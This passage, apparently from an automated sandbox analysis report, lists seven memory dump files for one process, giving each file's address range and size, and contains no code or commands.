                                                                                                                                                                                            • memory/4856-4826-0x0000000004920000-0x000000000493E000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              120KB

                                                                                                                                                                                            • memory/4856-5046-0x0000000004E20000-0x0000000004E3A000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              104KB

                                                                                                                                                                                            • memory/4856-5045-0x0000000006250000-0x00000000068CA000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              6.5MB

                                                                                                                                                                                            • memory/4856-5052-0x0000000004F20000-0x0000000004F42000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              136KB

                                                                                                                                                                                            • memory/4856-5054-0x00000000068D0000-0x0000000006E74000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              5.6MB

                                                                                                                                                                                            • memory/4856-5051-0x0000000005BD0000-0x0000000005C66000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              600KB

                                                                                                                                                                                            • memory/4856-4717-0x0000000000F70000-0x0000000000FA6000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              216KB